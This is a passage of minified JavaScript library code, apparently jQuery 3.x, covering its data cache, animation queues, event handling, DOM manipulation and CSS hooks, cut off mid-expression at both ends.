h(r) || (a = !0), l && (a ? (t.call(e, r), t = null) : (l = t, t = function (e, t, n) { return l.call(b(e), n) })), t)) for (; s < u; s++)t(e[s], n, a ? r : r.call(e[s], s, t(e[s], n))); return i ? e : l ? t.call(e) : u ? t(e[0], n) : o }, B = /^-ms-/, z = /-([a-z])/g; function X(e, t) { return t.toUpperCase() } function U(e) { return e.replace(B, "ms-").replace(z, X) } var V = function (e) { return 1 === e.nodeType || 9 === e.nodeType || !+e.nodeType }; function G() { this.expando = b.expando + G.uid++ } G.uid = 1, G.prototype = { cache: function (e) { var t = e[this.expando]; return t || (t = {}, V(e) && (e.nodeType ? e[this.expando] = t : Object.defineProperty(e, this.expando, { value: t, configurable: !0 }))), t }, set: function (e, t, n) { var r, i = this.cache(e); if ("string" == typeof t) i[U(t)] = n; else for (r in t) i[U(r)] = t[r]; return i }, get: function (e, t) { return void 0 === t ? this.cache(e) : e[this.expando] && e[this.expando][U(t)] }, access: function (e, t, n) { return void 0 === t || t && "string" == typeof t && void 0 === n ? this.get(e, t) : (this.set(e, t, n), void 0 !== n ? n : t) }, remove: function (e, t) { var n, r = e[this.expando]; if (void 0 !== r) { if (void 0 !== t) { n = (t = Array.isArray(t) ? t.map(U) : (t = U(t)) in r ? [t] : t.match(_) || []).length; for (; n--;)delete r[t[n]] } (void 0 === t || b.isEmptyObject(r)) && (e.nodeType ? e[this.expando] = void 0 : delete e[this.expando]) } }, hasData: function (e) { var t = e[this.expando]; return void 0 !== t && !b.isEmptyObject(t) } }; var Y = new G, Q = new G, J = /^(?:\{[\w\W]*\}|\[[\w\W]*\])$/, K = /[A-Z]/g; function Z(e, t, n) { var r; if (void 0 === n && 1 === e.nodeType) if (r = "data-" + t.replace(K, "-$&").toLowerCase(), "string" == typeof (n = e.getAttribute(r))) { try { n = function (e) { return "true" === e || "false" !== e && ("null" === e ? null : e === +e + "" ? +e : J.test(e) ? JSON.parse(e) : e) }(n) } catch (e) { } Q.set(e, t, n) } else n = void 0; return n } b.extend({ hasData: function (e) { return Q.hasData(e) || Y.hasData(e) }, data: function (e, t, n) { return Q.access(e, t, n) }, removeData: function (e, t) { Q.remove(e, t) }, _data: function (e, t, n) { return Y.access(e, t, n) }, _removeData: function (e, t) { Y.remove(e, t) } }), b.fn.extend({ data: function (e, t) { var n, r, i, o = this[0], a = o && o.attributes; if (void 0 === e) { if (this.length && (i = Q.get(o), 1 === o.nodeType && !Y.get(o, "hasDataAttrs"))) { for (n = a.length; n--;)a[n] && 0 === (r = a[n].name).indexOf("data-") && (r = U(r.slice(5)), Z(o, r, i[r])); Y.set(o, "hasDataAttrs", !0) } return i } return "object" == typeof e ? this.each(function () { Q.set(this, e) }) : F(this, function (t) { var n; if (o && void 0 === t) return void 0 !== (n = Q.get(o, e)) ? n : void 0 !== (n = Z(o, e)) ? n : void 0; this.each(function () { Q.set(this, e, t) }) }, null, t, arguments.length > 1, null, !0) }, removeData: function (e) { return this.each(function () { Q.remove(this, e) }) } }), b.extend({ queue: function (e, t, n) { var r; if (e) return t = (t || "fx") + "queue", r = Y.get(e, t), n && (!r || Array.isArray(n) ? r = Y.access(e, t, b.makeArray(n)) : r.push(n)), r || [] }, dequeue: function (e, t) { t = t || "fx"; var n = b.queue(e, t), r = n.length, i = n.shift(), o = b._queueHooks(e, t); "inprogress" === i && (i = n.shift(), r--), i && ("fx" === t && n.unshift("inprogress"), delete o.stop, i.call(e, function () { b.dequeue(e, t) }, o)), !r && o && o.empty.fire() }, _queueHooks: function (e, t) { var n = t + "queueHooks"; return Y.get(e, n) || Y.access(e, n, { empty: b.Callbacks("once memory").add(function () { Y.remove(e, [t + "queue", n]) }) }) } }), b.fn.extend({ queue: function (e, t) { var n = 2; return "string" != typeof e && (t = e, e = "fx", n--), arguments.length < n ? b.queue(this[0], e) : void 0 === t ? this : this.each(function () { var n = b.queue(this, e, t); b._queueHooks(this, e), "fx" === e && "inprogress" !== n[0] && b.dequeue(this, e) }) }, dequeue: function (e) { return this.each(function () { b.dequeue(this, e) }) }, clearQueue: function (e) { return this.queue(e || "fx", []) }, promise: function (e, t) { var n, r = 1, i = b.Deferred(), o = this, a = this.length, s = function () { --r || i.resolveWith(o, [o]) }; for ("string" != typeof e && (t = e, e = void 0), e = e || "fx"; a--;)(n = Y.get(o[a], e + "queueHooks")) && n.empty && (r++, n.empty.add(s)); return s(), i.promise(t) } }); var ee = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source, te = new RegExp("^(?:([+-])=|)(" + ee + ")([a-z%]*)$", "i"), ne = ["Top", "Right", "Bottom", "Left"], re = v.documentElement, ie = function (e) { return b.contains(e.ownerDocument, e) }, oe = { composed: !0 }; re.getRootNode && (ie = function (e) { return b.contains(e.ownerDocument, e) || e.getRootNode(oe) === e.ownerDocument }); var ae = function (e, t) { return "none" === (e = t || e).style.display || "" === e.style.display && ie(e) && "none" === b.css(e, "display") }; function se(e, t, n, r) { var i, o, a = 20, s = r ? function () { return r.cur() } : function () { return b.css(e, t, "") }, u = s(), l = n && n[3] || (b.cssNumber[t] ? "" : "px"), c = e.nodeType && (b.cssNumber[t] || "px" !== l && +u) && te.exec(b.css(e, t)); if (c && c[3] !== l) { for (u /= 2, l = l || c[3], c = +u || 1; a--;)b.style(e, t, c + l), (1 - o) * (1 - (o = s() / u || .5)) <= 0 && (a = 0), c /= o; c *= 2, b.style(e, t, c + l), n = n || [] } return n && (c = +c || +u || 0, i = n[1] ? c + (n[1] + 1) * n[2] : +n[2], r && (r.unit = l, r.start = c, r.end = i)), i } var ue = {}; function le(e) { var t, n = e.ownerDocument, r = e.nodeName, i = ue[r]; return i || (t = n.body.appendChild(n.createElement(r)), i = b.css(t, "display"), t.parentNode.removeChild(t), "none" === i && (i = "block"), ue[r] = i, i) } function ce(e, t) { for (var n, r, i = [], o = 0, a = e.length; o < a; o++)(r = e[o]).style && (n = r.style.display, t ? ("none" === n && (i[o] = Y.get(r, "display") || null, i[o] || (r.style.display = "")), "" === r.style.display && ae(r) && (i[o] = le(r))) : "none" !== n && (i[o] = "none", Y.set(r, "display", n))); for (o = 0; o < a; o++)null != i[o] && (e[o].style.display = i[o]); return e } b.fn.extend({ show: function () { return ce(this, !0) }, hide: function () { return ce(this) }, toggle: function (e) { return "boolean" == typeof e ? e ? this.show() : this.hide() : this.each(function () { ae(this) ? b(this).show() : b(this).hide() }) } }); var fe, pe, de = /^(?:checkbox|radio)$/i, he = /<([a-z][^\/\0>\x20\t\r\n\f]*)/i, ge = /^$|^module$|\/(?:java|ecma)script/i; fe = v.createDocumentFragment().appendChild(v.createElement("div")), (pe = v.createElement("input")).setAttribute("type", "radio"), pe.setAttribute("checked", "checked"), pe.setAttribute("name", "t"), fe.appendChild(pe), d.checkClone = fe.cloneNode(!0).cloneNode(!0).lastChild.checked, fe.innerHTML = "<textarea>x</textarea>", d.noCloneChecked = !!fe.cloneNode(!0).lastChild.defaultValue, fe.innerHTML = "<option></option>", d.option = !!fe.lastChild; var ve = { thead: [1, "<table>", "</table>"], col: [2, "<table><colgroup>", "</colgroup></table>"], tr: [2, "<table><tbody>", "</tbody></table>"], td: [3, "<table><tbody><tr>", "</tr></tbody></table>"], _default: [0, "", ""] }; function ye(e, t) { var n; return n = void 0 !== e.getElementsByTagName ? e.getElementsByTagName(t || "*") : void 0 !== e.querySelectorAll ? e.querySelectorAll(t || "*") : [], void 0 === t || t && A(e, t) ? b.merge([e], n) : n } function me(e, t) { for (var n = 0, r = e.length; n < r; n++)Y.set(e[n], "globalEval", !t || Y.get(t[n], "globalEval")) } ve.tbody = ve.tfoot = ve.colgroup = ve.caption = ve.thead, ve.th = ve.td, d.option || (ve.optgroup = ve.option = [1, "<select multiple='multiple'>", "</select>"]); var xe = /<|&#?\w+;/; function be(e, t, n, r, i) { for (var o, a, s, u, l, c, f = t.createDocumentFragment(), p = [], d = 0, h = e.length; d < h; d++)if ((o = e[d]) || 0 === o) if ("object" === x(o)) b.merge(p, o.nodeType ? [o] : o); else if (xe.test(o)) { for (a = a || f.appendChild(t.createElement("div")), s = (he.exec(o) || ["", ""])[1].toLowerCase(), u = ve[s] || ve._default, a.innerHTML = u[1] + b.htmlPrefilter(o) + u[2], c = u[0]; c--;)a = a.lastChild; b.merge(p, a.childNodes), (a = f.firstChild).textContent = "" } else p.push(t.createTextNode(o)); for (f.textContent = "", d = 0; o = p[d++];)if (r && b.inArray(o, r) > -1) i && i.push(o); else if (l = ie(o), a = ye(f.appendChild(o), "script"), l && me(a), n) for (c = 0; o = a[c++];)ge.test(o.type || "") && n.push(o); return f } var we = /^([^.]*)(?:\.(.+)|)/; function Te() { return !0 } function Ce() { return !1 } function Ee(e, t) { return e === function () { try { return v.activeElement } catch (e) { } }() == ("focus" === t) } function Se(e, t, n, r, i, o) { var a, s; if ("object" == typeof t) { for (s in "string" != typeof n && (r = r || n, n = void 0), t) Se(e, s, n, r, t[s], o); return e } if (null == r && null == i ? (i = n, r = n = void 0) : null == i && ("string" == typeof n ? (i = r, r = void 0) : (i = r, r = n, n = void 0)), !1 === i) i = Ce; else if (!i) return e; return 1 === o && (a = i, (i = function (e) { return b().off(e), a.apply(this, arguments) }).guid = a.guid || (a.guid = b.guid++)), e.each(function () { b.event.add(this, t, i, r, n) }) } function Ae(e, t, n) { n ? (Y.set(e, t, !1), b.event.add(e, t, { namespace: !1, handler: function (e) { var r, o, a = Y.get(this, t); if (1 & e.isTrigger && this[t]) { if (a.length) (b.event.special[t] || {}).delegateType && e.stopPropagation(); else if (a = i.call(arguments), Y.set(this, t, a), r = n(this, t), this[t](), a !== (o = Y.get(this, t)) || r ? Y.set(this, t, !1) : o = {}, a !== o) return e.stopImmediatePropagation(), e.preventDefault(), o && o.value } else a.length && (Y.set(this, t, { value: b.event.trigger(b.extend(a[0], b.Event.prototype), a.slice(1), this) }), e.stopImmediatePropagation()) } })) : void 0 === Y.get(e, t) && b.event.add(e, t, Te) } b.event = { global: {}, add: function (e, t, n, r, i) { var o, a, s, u, l, c, f, p, d, h, g, v = Y.get(e); if (V(e)) for (n.handler && (n = (o = n).handler, i = o.selector), i && b.find.matchesSelector(re, i), n.guid || (n.guid = b.guid++), (u = v.events) || (u = v.events = Object.create(null)), (a = v.handle) || (a = v.handle = function (t) { return void 0 !== b && b.event.triggered !== t.type ? b.event.dispatch.apply(e, arguments) : void 0 }), l = (t = (t || "").match(_) || [""]).length; l--;)d = g = (s = we.exec(t[l]) || [])[1], h = (s[2] || "").split(".").sort(), d && (f = b.event.special[d] || {}, d = (i ? f.delegateType : f.bindType) || d, f = b.event.special[d] || {}, c = b.extend({ type: d, origType: g, data: r, handler: n, guid: n.guid, selector: i, needsContext: i && b.expr.match.needsContext.test(i), namespace: h.join(".") }, o), (p = u[d]) || ((p = u[d] = []).delegateCount = 0, f.setup && !1 !== f.setup.call(e, r, h, a) || e.addEventListener && e.addEventListener(d, a)), f.add && (f.add.call(e, c), c.handler.guid || (c.handler.guid = n.guid)), i ? p.splice(p.delegateCount++, 0, c) : p.push(c), b.event.global[d] = !0) }, remove: function (e, t, n, r, i) { var o, a, s, u, l, c, f, p, d, h, g, v = Y.hasData(e) && Y.get(e); if (v && (u = v.events)) { for (l = (t = (t || "").match(_) || [""]).length; l--;)if (d = g = (s = we.exec(t[l]) || [])[1], h = (s[2] || "").split(".").sort(), d) { for (f = b.event.special[d] || {}, p = u[d = (r ? f.delegateType : f.bindType) || d] || [], s = s[2] && new RegExp("(^|\\.)" + h.join("\\.(?:.*\\.|)") + "(\\.|$)"), a = o = p.length; o--;)c = p[o], !i && g !== c.origType || n && n.guid !== c.guid || s && !s.test(c.namespace) || r && r !== c.selector && ("**" !== r || !c.selector) || (p.splice(o, 1), c.selector && p.delegateCount--, f.remove && f.remove.call(e, c)); a && !p.length && (f.teardown && !1 !== f.teardown.call(e, h, v.handle) || b.removeEvent(e, d, v.handle), delete u[d]) } else for (d in u) b.event.remove(e, d + t[l], n, r, !0); b.isEmptyObject(u) && Y.remove(e, "handle events") } }, dispatch: function (e) { var t, n, r, i, o, a, s = new Array(arguments.length), u = b.event.fix(e), l = (Y.get(this, "events") || Object.create(null))[u.type] || [], c = b.event.special[u.type] || {}; for (s[0] = u, t = 1; t < arguments.length; t++)s[t] = arguments[t]; if (u.delegateTarget = this, !c.preDispatch || !1 !== c.preDispatch.call(this, u)) { for (a = b.event.handlers.call(this, u, l), t = 0; (i = a[t++]) && !u.isPropagationStopped();)for (u.currentTarget = i.elem, n = 0; (o = i.handlers[n++]) && !u.isImmediatePropagationStopped();)u.rnamespace && !1 !== o.namespace && !u.rnamespace.test(o.namespace) || (u.handleObj = o, u.data = o.data, void 0 !== (r = ((b.event.special[o.origType] || {}).handle || o.handler).apply(i.elem, s)) && !1 === (u.result = r) && (u.preventDefault(), u.stopPropagation())); return c.postDispatch && c.postDispatch.call(this, u), u.result } }, handlers: function (e, t) { var n, r, i, o, a, s = [], u = t.delegateCount, l = e.target; if (u && l.nodeType && !("click" === e.type && e.button >= 1)) for (; l !== this; l = l.parentNode || this)if (1 === l.nodeType && ("click" !== e.type || !0 !== l.disabled)) { for (o = [], a = {}, n = 0; n < u; n++)void 0 === a[i = (r = t[n]).selector + " "] && (a[i] = r.needsContext ? b(i, this).index(l) > -1 : b.find(i, this, null, [l]).length), a[i] && o.push(r); o.length && s.push({ elem: l, handlers: o }) } return l = this, u < t.length && s.push({ elem: l, handlers: t.slice(u) }), s }, addProp: function (e, t) { Object.defineProperty(b.Event.prototype, e, { enumerable: !0, configurable: !0, get: h(t) ? function () { if (this.originalEvent) return t(this.originalEvent) } : function () { if (this.originalEvent) return this.originalEvent[e] }, set: function (t) { Object.defineProperty(this, e, { enumerable: !0, configurable: !0, writable: !0, value: t }) } }) }, fix: function (e) { return e[b.expando] ? e : new b.Event(e) }, special: { load: { noBubble: !0 }, click: { setup: function (e) { var t = this || e; return de.test(t.type) && t.click && A(t, "input") && Ae(t, "click", Te), !1 }, trigger: function (e) { var t = this || e; return de.test(t.type) && t.click && A(t, "input") && Ae(t, "click"), !0 }, _default: function (e) { var t = e.target; return de.test(t.type) && t.click && A(t, "input") && Y.get(t, "click") || A(t, "a") } }, beforeunload: { postDispatch: function (e) { void 0 !== e.result && e.originalEvent && (e.originalEvent.returnValue = e.result) } } } }, b.removeEvent = function (e, t, n) { e.removeEventListener && e.removeEventListener(t, n) }, b.Event = function (e, t) { if (!(this instanceof b.Event)) return new b.Event(e, t); e && e.type ? (this.originalEvent = e, this.type = e.type, this.isDefaultPrevented = e.defaultPrevented || void 0 === e.defaultPrevented && !1 === e.returnValue ? Te : Ce, this.target = e.target && 3 === e.target.nodeType ? e.target.parentNode : e.target, this.currentTarget = e.currentTarget, this.relatedTarget = e.relatedTarget) : this.type = e, t && b.extend(this, t), this.timeStamp = e && e.timeStamp || Date.now(), this[b.expando] = !0 }, b.Event.prototype = { constructor: b.Event, isDefaultPrevented: Ce, isPropagationStopped: Ce, isImmediatePropagationStopped: Ce, isSimulated: !1, preventDefault: function () { var e = this.originalEvent; this.isDefaultPrevented = Te, e && !this.isSimulated && e.preventDefault() }, stopPropagation: function () { var e = this.originalEvent; this.isPropagationStopped = Te, e && !this.isSimulated && e.stopPropagation() }, stopImmediatePropagation: function () { var e = this.originalEvent; this.isImmediatePropagationStopped = Te, e && !this.isSimulated && e.stopImmediatePropagation(), this.stopPropagation() } }, b.each({ altKey: !0, bubbles: !0, cancelable: !0, changedTouches: !0, ctrlKey: !0, detail: !0, eventPhase: !0, metaKey: !0, pageX: !0, pageY: !0, shiftKey: !0, view: !0, char: !0, code: !0, charCode: !0, key: !0, keyCode: !0, button: !0, buttons: !0, clientX: !0, clientY: !0, offsetX: !0, offsetY: !0, pointerId: !0, pointerType: !0, screenX: !0, screenY: !0, targetTouches: !0, toElement: !0, touches: !0, which: !0 }, b.event.addProp), b.each({ focus: "focusin", blur: "focusout" }, function (e, t) { b.event.special[e] = { setup: function () { return Ae(this, e, Ee), !1 }, trigger: function () { return Ae(this, e), !0 }, _default: function () { return !0 }, delegateType: t } }), b.each({ mouseenter: "mouseover", mouseleave: "mouseout", pointerenter: "pointerover", pointerleave: "pointerout" }, function (e, t) { b.event.special[e] = { delegateType: t, bindType: t, handle: function (e) { var n, r = e.relatedTarget, i = e.handleObj; return r && (r === this || b.contains(this, r)) || (e.type = i.origType, n = i.handler.apply(this, arguments), e.type = t), n } } }), b.fn.extend({ on: function (e, t, n, r) { return Se(this, e, t, n, r) }, one: function (e, t, n, r) { return Se(this, e, t, n, r, 1) }, off: function (e, t, n) { var r, i; if (e && e.preventDefault && e.handleObj) return r = e.handleObj, b(e.delegateTarget).off(r.namespace ? r.origType + "." + r.namespace : r.origType, r.selector, r.handler), this; if ("object" == typeof e) { for (i in e) this.off(i, t, e[i]); return this } return !1 !== t && "function" != typeof t || (n = t, t = void 0), !1 === n && (n = Ce), this.each(function () { b.event.remove(this, e, n, t) }) } }); var ke = /<script|<style|<link/i, Ne = /checked\s*(?:[^=]|=\s*.checked.)/i, je = /^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g; function De(e, t) { return A(e, "table") && A(11 !== t.nodeType ? t : t.firstChild, "tr") && b(e).children("tbody")[0] || e } function qe(e) { return e.type = (null !== e.getAttribute("type")) + "/" + e.type, e } function Le(e) { return "true/" === (e.type || "").slice(0, 5) ? e.type = e.type.slice(5) : e.removeAttribute("type"), e } function He(e, t) { var n, r, i, o, a, s; if (1 === t.nodeType) { if (Y.hasData(e) && (s = Y.get(e).events)) for (i in Y.remove(t, "handle events"), s) for (n = 0, r = s[i].length; n < r; n++)b.event.add(t, i, s[i][n]); Q.hasData(e) && (o = Q.access(e), a = b.extend({}, o), Q.set(t, a)) } } function _e(e, t, n, r) { t = o(t); var i, a, s, u, l, c, f = 0, p = e.length, g = p - 1, v = t[0], y = h(v); if (y || p > 1 && "string" == typeof v && !d.checkClone && Ne.test(v)) return e.each(function (i) { var o = e.eq(i); y && (t[0] = v.call(this, i, o.html())), _e(o, t, n, r) }); if (p && (a = (i = be(t, e[0].ownerDocument, !1, e, r)).firstChild, 1 === i.childNodes.length && (i = a), a || r)) { for (u = (s = b.map(ye(i, "script"), qe)).length; f < p; f++)l = i, f !== g && (l = b.clone(l, !0, !0), u && b.merge(s, ye(l, "script"))), n.call(e[f], l, f); if (u) for (c = s[s.length - 1].ownerDocument, b.map(s, Le), f = 0; f < u; f++)l = s[f], ge.test(l.type || "") && !Y.access(l, "globalEval") && b.contains(c, l) && (l.src && "module" !== (l.type || "").toLowerCase() ? b._evalUrl && !l.noModule && b._evalUrl(l.src, { nonce: l.nonce || l.getAttribute("nonce") }, c) : m(l.textContent.replace(je, ""), l, c)) } return e } function Oe(e, t, n) { for (var r, i = t ? b.filter(t, e) : e, o = 0; null != (r = i[o]); o++)n || 1 !== r.nodeType || b.cleanData(ye(r)), r.parentNode && (n && ie(r) && me(ye(r, "script")), r.parentNode.removeChild(r)); return e } b.extend({ htmlPrefilter: function (e) { return e }, clone: function (e, t, n) { var r, i, o, a, s, u, l, c = e.cloneNode(!0), f = ie(e); if (!(d.noCloneChecked || 1 !== e.nodeType && 11 !== e.nodeType || b.isXMLDoc(e))) for (a = ye(c), r = 0, i = (o = ye(e)).length; r < i; r++)s = o[r], u = a[r], l = void 0, "input" === (l = u.nodeName.toLowerCase()) && de.test(s.type) ? u.checked = s.checked : "input" !== l && "textarea" !== l || (u.defaultValue = s.defaultValue); if (t) if (n) for (o = o || ye(e), a = a || ye(c), r = 0, i = o.length; r < i; r++)He(o[r], a[r]); else He(e, c); return (a = ye(c, "script")).length > 0 && me(a, !f && ye(e, "script")), c }, cleanData: function (e) { for (var t, n, r, i = b.event.special, o = 0; void 0 !== (n = e[o]); o++)if (V(n)) { if (t = n[Y.expando]) { if (t.events) for (r in t.events) i[r] ? b.event.remove(n, r) : b.removeEvent(n, r, t.handle); n[Y.expando] = void 0 } n[Q.expando] && (n[Q.expando] = void 0) } } }), b.fn.extend({ detach: function (e) { return Oe(this, e, !0) }, remove: function (e) { return Oe(this, e) }, text: function (e) { return F(this, function (e) { return void 0 === e ? b.text(this) : this.empty().each(function () { 1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType || (this.textContent = e) }) }, null, e, arguments.length) }, append: function () { return _e(this, arguments, function (e) { 1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType || De(this, e).appendChild(e) }) }, prepend: function () { return _e(this, arguments, function (e) { if (1 === this.nodeType || 11 === this.nodeType || 9 === this.nodeType) { var t = De(this, e); t.insertBefore(e, t.firstChild) } }) }, before: function () { return _e(this, arguments, function (e) { this.parentNode && this.parentNode.insertBefore(e, this) }) }, after: function () { return _e(this, arguments, function (e) { this.parentNode && this.parentNode.insertBefore(e, this.nextSibling) }) }, empty: function () { for (var e, t = 0; null != (e = this[t]); t++)1 === e.nodeType && (b.cleanData(ye(e, !1)), e.textContent = ""); return this }, clone: function (e, t) { return e = null != e && e, t = null == t ? e : t, this.map(function () { return b.clone(this, e, t) }) }, html: function (e) { return F(this, function (e) { var t = this[0] || {}, n = 0, r = this.length; if (void 0 === e && 1 === t.nodeType) return t.innerHTML; if ("string" == typeof e && !ke.test(e) && !ve[(he.exec(e) || ["", ""])[1].toLowerCase()]) { e = b.htmlPrefilter(e); try { for (; n < r; n++)1 === (t = this[n] || {}).nodeType && (b.cleanData(ye(t, !1)), t.innerHTML = e); t = 0 } catch (e) { } } t && this.empty().append(e) }, null, e, arguments.length) }, replaceWith: function () { var e = []; return _e(this, arguments, function (t) { var n = this.parentNode; b.inArray(this, e) < 0 && (b.cleanData(ye(this)), n && n.replaceChild(t, this)) }, e) } }), b.each({ appendTo: "append", prependTo: "prepend", insertBefore: "before", insertAfter: "after", replaceAll: "replaceWith" }, function (e, t) { b.fn[e] = function (e) { for (var n, r = [], i = b(e), o = i.length - 1, s = 0; s <= o; s++)n = s === o ? this : this.clone(!0), b(i[s])[t](n), a.apply(r, n.get()); return this.pushStack(r) } }); var Pe = new RegExp("^(" + ee + ")(?!px)[a-z%]+$", "i"), Re = function (t) { var n = t.ownerDocument.defaultView; return n && n.opener || (n = e), n.getComputedStyle(t) }, Me = function (e, t, n) { var r, i, o = {}; for (i in t) o[i] = e.style[i], e.style[i] = t[i]; for (i in r = n.call(e), t) e.style[i] = o[i]; return r }, Ie = new RegExp(ne.join("|"), "i"); function We(e, t, n) { var r, i, o, a, s = e.style; return (n = n || Re(e)) && ("" !== (a = n.getPropertyValue(t) || n[t]) || ie(e) || (a = b.style(e, t)), !d.pixelBoxStyles() && Pe.test(a) && Ie.test(t) && (r = s.width, i = s.minWidth, o = s.maxWidth, s.minWidth = s.maxWidth = s.width = a, a = n.width, s.width = r, s.minWidth = i, s.maxWidth = o)), void 0 !== a ? a + "" : a } function Fe(e, t) { return { get: function () { if (!e()) return (this.get = t).apply(this, arguments); delete this.get } } } !function () { function t() { if (c) { l.style.cssText = "position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0", c.style.cssText = "position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%", re.appendChild(l).appendChild(c); var t = e.getComputedStyle(c); r = "1%" !== t.top, u = 12 === n(t.marginLeft), c.style.right = "60%", a = 36 === n(t.right), i = 36 === n(t.width), c.style.position = "absolute", o = 12 === n(c.offsetWidth / 3), re.removeChild(l), c = null } } function n(e) { return Math.round(parseFloat(e)) } var r, i, o, a, s, u, l = v.createElement("div"), c = v.createElement("div"); c.style && (c.style.backgroundClip = "content-box", c.cloneNode(!0).style.backgroundClip = "", d.clearCloneStyle = "content-box" === c.style.backgroundClip, b.extend(d, { boxSizingReliable: function () { return t(), i }, pixelBoxStyles: function () { return t(), a }, pixelPosition: function () { return t(), r }, reliableMarginLeft: function () { return t(), u }, scrollboxSize: function () { return t(), o }, reliableTrDimensions: function () { var t, n, r, i; return null == s && (t = v.createElement("table"), n = v.createElement("tr"), r = v.createElement("div"), t.style.cssText = "position:absolute;left:-11111px;border-collapse:separate", n.style.cssText = "border:1px solid", n.style.height = "1px", r.style.height = "9px", r.style.display = "block", re.appendChild(t).appendChild(n).appendChild(r), i = e.getComputedStyle(n), s = parseInt(i.height, 10) + parseInt(i.borderTopWidth, 10) + parseInt(i.borderBottomWidth, 10) === n.offsetHeight, re.removeChild(t)), s } })) }(); var $e = ["Webkit", "Moz", "ms"], Be = v.createElement("div").style, ze = {}; function Xe(e) { var t = b.cssProps[e] || ze[e]; return t || (e in Be ? e : ze[e] = function (e) { for (var t = e[0].toUpperCase() + e.slice(1), n = $e.length; n--;)if ((e = $e[n] + t) in Be) return e }(e) || e) } var Ue = /^(none|table(?!-c[ea]).+)/, Ve = /^--/, Ge = { position: "absolute", visibility: "hidden", display: "block" }, Ye = { letterSpacing: "0", fontWeight: "400" }; function Qe(e, t, n) { var r = te.exec(t); return r ? Math.max(0, r[2] - (n || 0)) + (r[3] || "px") : t } function Je(e, t, n, r, i, o) { var a = "width" === t ? 1 : 0, s = 0, u = 0; if (n === (r ? "border" : "content")) return 0; for (; a < 4; a += 2)"margin" === n && (u += b.css(e, n + ne[a], !0, i)), r ? ("content" === n && (u -= b.css(e, "padding" + ne[a], !0, i)), "margin" !== n && (u -= b.css(e, "border" + ne[a] + "Width", !0, i))) : (u += b.css(e, "padding" + ne[a], !0, i), "padding" !== n ? u += b.css(e, "border" + ne[a] + "Width", !0, i) : s += b.css(e, "border" + ne[a] + "Width", !0, i)); return !r && o >= 0 && (u += Math.max(0, Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - o - u - s - .5)) || 0), u } function Ke(e, t, n) { var r = Re(e), i = (!d.boxSizingReliable() || n) && "border-box" === b.css(e, "boxSizing", !1, r), o = i, a = We(e, t, r), s = "offset" + t[0].toUpperCase() + t.slice(1); if (Pe.test(a)) { if (!n) return a; a = "auto" } return (!d.boxSizingReliable() && i || !d.reliableTrDimensions() && A(e, "tr") || "auto" === a || !parseFloat(a) && "inline" === b.css(e, "display", !1, r)) && e.getClientRects().length && (i = "border-box" === b.css(e, "boxSizing", !1, r), (o = s in e) && (a = e[s])), (a = parseFloat(a) || 0) + Je(e, t, n || (i ? "border" : "content"), o, r, a) + "px" } function Ze(e, t, n, r, i) { return new Ze.prototype.init(e, t, n, r, i) } b.extend({ cssHooks: { opacity: { get: function (e, t) { if (t) { var n = We(e, "opacity"); return "" === n ? "1" : n } } } }, cssNumber: { animationIterationCount: !0, columnCount: !0, fillOpacity: !0, flexGrow: !0, flexShrink: !0, fontWeight: !0, gridArea: !0, gridColumn: !0, gridColumnEnd: !0, gridColumnStart: !0, gridRow: !0, gridRowEnd: !0, gridRowStart: !0, lineHeight: !0, opacity: !0, order: !0, orphans: !0, widows: !0, zIndex: !0, zoom: !0 }, cssProps: {}, style: function (e, t, n, r) { if (e && 3 !== e.nodeType && 8 !== e.nodeType && e.style) { var i, o, a, s = U(t), u = Ve.test(t), l = e.style; if (u || (t = Xe(s)), a = b.cssHooks[t] || b.cssHooks[s], void 0 === n) return a && "get" in a && void 0 !== (i = a.get(e, !1, r)) ? i : l[t]; "string" === (o = typeof n) && (i = te.exec(n)) && i[1] && (n = se(e, t, i), o = "number"), null != n && n == n && ("number" !== o || u || (n += i && i[3] || (b.cssNumber[s] ? "" : "px")), d.clearCloneStyle || "" !== n || 0 !== t.indexOf("background") || (l[t] = "inherit"), a && "set" in a && void 0 === (n = a.set(e, n, r)) || (u ? l.setProperty(t, n) : l[t] = n)) } }, css: function (e, t, n, r) { var i, o, a, s = U(t); return Ve.test(t) || (t = Xe(s)), (a = b.cssHooks[t] || b.cssHooks[s]) && "get" in a && (i = a.get(e, !0, n)), void 0 === i && (i = We(e, t, r)), "normal" === i && t in Ye && (i = Ye[t]), "" === n || n ? (o = parseFloat(i), !0 === n || isFinite(o) ? o || 0 : i) : i } }), b.each(["height", "width"], function (e, t) { b.cssHooks[t] = { get: function (e, n, r) { if (n) return !Ue.test(b.css(e, "display")) || e.getClientRects().length && e.getBoundingClientRect().width ? Ke(e, t, r) : Me(e, Ge, function () { return Ke(e, t, r) }) }, set: function (e, n, r) { var i, o = Re(e), a = !d.scrollboxSize() && "absolute" === o.position, s = (a || r) && "border-box" === b.css(e, "boxSizing", !1, o), u = r ? Je(e, t, r, s, o) : 0; return s && a && (u -= Math.ceil(e["offset" + t[0].toUpperCase() + t.slice(1)] - parseFloat(o[t]) - Je(e, t, "border", !1, o) - .5)), u && (i = te.exec(n)) && "px" !== (i[3] || "px") && (e.style[t] = n, n = b.css(e, t)), Qe(0, n, u) } } }), b.cssHooks.marginLeft = Fe(d.reliableMarginLeft, function (e, t) { if (t) return (parseFloat(We(e, "marginLeft")) || e.getBoundingClientRect().left - Me(e, { marginLeft: 0 }, function () { return e.getBoundingClientRect().left })) + "px" }), b.each({ margin: "", padding: "", border: "Width" }, function (e, t) { b.cssHooks[e + t] = { expand: function (n) { for (var r = 0, i = {}, o = "string" == typeof n ? n.split(" ") : [n]; r < 4; r++)i[e + ne[r] + t] = o[r] || o[r - 2] || o[0]; return i } }, "margin" !== e && (b.cssHooks[e + t].set = Qe) }), b.fn.extend({ css: function (e, t) { return F(this, function (e, t, n) { var r, i, o = {}, a = 0; if (Array.isArray(t)) { for (r = Re(e), i = t.length; a < i; a++)o[t[a]] = b.css(e, t[a], !1, r); return o } return void 0 !== n ? b.style(e, t, n) : b.css(e, t) }, e, t, arguments.length > 1) } }), b.Tween = Ze, Ze.prototype = { constructor: Ze, init: function (e, t, n, r, i, o) { this.elem = e, this.prop = n, this.easing = i || b.easing._default, this.options = t, this.start = this.now = this.cur(), this.end = r, this.unit = o || 